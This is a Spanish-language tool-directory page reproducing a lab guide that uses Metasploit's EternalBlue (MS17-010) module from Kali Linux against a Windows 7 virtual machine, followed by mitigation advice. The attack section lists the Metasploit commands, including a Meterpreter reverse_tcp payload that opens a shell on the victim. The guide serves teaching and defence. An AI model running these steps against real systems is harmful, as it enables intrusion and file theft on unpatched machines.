Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
SMB-Protocol-Vulnerability_CVE-2017-0144 — Guía de laboratorio paso a paso que demuestra el exploit EternalBlue (CVE-2017-0144) contra el protocolo SMB de Windows 7 usando Metasploit, incluyendo pasos de configuración, explotación y mitigación. | Kitploit
Herramientas/GitHubGitHub/luckyman2907/smb-protocol-vulnerability_cve-2017-0144
Análisis de VulnerabilidadesExplotaciónSeguridad de RedesPruebas de PenetraciónAprendizaje y EducaciónLabs y Práctica
GitHubluckyman2907/smb-protocol-vulnerability_cve-2017-0144

SMB-Protocol-Vulnerability_CVE-2017-0144

Guía de laboratorio paso a paso que demuestra el exploit EternalBlue (CVE-2017-0144) contra el protocolo SMB de Windows 7 usando Metasploit, incluyendo pasos de configuración, explotación y mitigación.

Ver Repositorio
2hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

LAB: ATAQUE AL SISTEMA OPERATIVO WINDOWS BASADO EN LA VULNERABILIDAD DEL PROTOCOLO SMB.

  • 1. DESCRIPCIÓN
  • 2. INTRODUCCIÓN
  • 3. PREPARACIÓN
  • 4. REALIZACIÓN DEL ATAQUE
  • 5. CÓMO PREVENIR

1. DESCRIPCIÓN

En este laboratorio usaremos dos computadoras para simular un ataque basado en la vulnerabilidad del protocolo SMB del sistema operativo Windows. Una máquina ejecuta el sistema operativo Kali Linux, que desempeña el papel del atacante (hacker). Y otra computadora actúa como la máquina víctima. La máquina víctima ejecuta el sistema operativo Windows 7 de 64 bits, que contiene la vulnerabilidad SMB. Para lograrlo, en la máquina Kali Linux usaremos el exploit llamado EternalBlue para atacar la máquina Windows 7.

2. INTRODUCCIÓN

Server Message Block (SMB) es un protocolo de uso compartido de archivos bastante común en la plataforma Windows de Microsoft. Gracias a este protocolo SMB, las computadoras Windows conectadas entre sí en la misma red o en el mismo dominio pueden compartir archivos entre ellas. Hasta hoy, SMB también se conoce como Common Internet File Sharing (CIFS).

EternalBlue es un exploit que aprovecha la vulnerabilidad del protocolo SMB a través del puerto 445. Inicialmente, EternalBlue fue desarrollado por la Agencia de Seguridad Nacional de los Estados Unidos (NSA). Su nombre completo en inglés es U.S. National Security Agency. Pero luego fue filtrado por el grupo Hacker The Shadow Brokens en 2017. Ese mismo año se produjo un ataque a gran escala del virus de cifrado de datos – ransomware, dirigido a las computadoras Windows de Microsoft, en todo el mundo. Entre ellos, el más famoso fue el virus . Hasta la fecha, aunque esta vulnerabilidad ha sido parcheada por Microsoft mediante la actualización de seguridad . Sin embargo, en el mundo, una gran cantidad de computadoras que ejecutan el sistema operativo Windows todavía presentan esta vulnerabilidad. Esta vulnerabilidad fue publicada en . (Windows SMB Remote Code Execution Vulnerability). Esta vulnerabilidad es extremadamente peligrosa y muy fácil de explotar. Lo destacable es que para atacar a través de esta vulnerabilidad del protocolo SMB, el hacker no necesita enviar ni engañar a la víctima para que descargue o ejecute ningún virus malicioso. Es decir, la víctima, incluso si no hace nada, puede ser atacada fácilmente por el hacker, quien toma el control de la computadora sin que ella se dé cuenta.

WannaCry
MS17-010
CVE-2017-0144

3. PREPARACIÓN

Prepara 02 máquinas virtuales que se ejecutan en el software VMware Workstation:

  • Máquina virtual Kali Linux (máquina atacante) con dirección IP: 192.168.198.140
  • Máquina virtual Windows 7 (máquina víctima) con dirección IP: 192.168.198.143

  1. En la máquina virtual Kali (atacante):

    • Comprobar la IP: ifconfig
    • Iniciar el servicio Postgresql: service postgresql start
    • Para comprobar si postgresql ya está en ejecución, usamos el comando: service postgresql status
  2. En la máquina virtual Windows 7 (víctima):

    • Comprobar la IP : ipconfig
    • Desactivar el cortafuegos (Firewall)

4. REALIZACIÓN DEL ATAQUE

  • En la máquina Kali: inicia sesión en Metasploit con el comando: msfconsole

  • Una vez dentro de Metasploit, buscamos los exploits y las sintaxis relacionadas con ms17_010 con el comando: search ms17_010

  • Añadir la dirección IP de la máquina víctima,máquina atacante
  • Configurar el payload para explotar: use 0 -> set payload windows/x64/meterpreter/reverse_tcp

  • Ejecutar el exploit para llevar a cabo la explotación
  • Abrir una shell en la máquina de la víctima (se realiza a través de la terminal de la máquina atacante) después de haber logrado el acceso

=>En este punto, se considera que el hacker ha logrado infiltrarse en la máquina víctima. En este momento, el hacker puede borrar y robar archivos de la máquina de la víctima sin que ella lo sepa. Incluso puede subir y ejecutar virus directamente en ella.

5. CÓMO PREVENIR

Para evitar ser explotado y que se aprovechen del protocolo SMB, debemos realizar las siguientes tareas:

  • Activar el cortafuegos (Firewall).
  • Actualizar Windows a la versión más reciente. O descargar e instalar los parches de seguridad de Microsoft. Especialmente el parche de seguridad ms17_010.
  • Bloquear los puertos 135, 445.
    • netsh advfirewall firewall add rule dir=in action=block protocol=TCP localport=135 name="Block_Cong_135"
    • netsh advfirewall firewall add rule dir=in action=block protocol=TCP localport=445 name="Block_Cong_445"
Descargar herramienta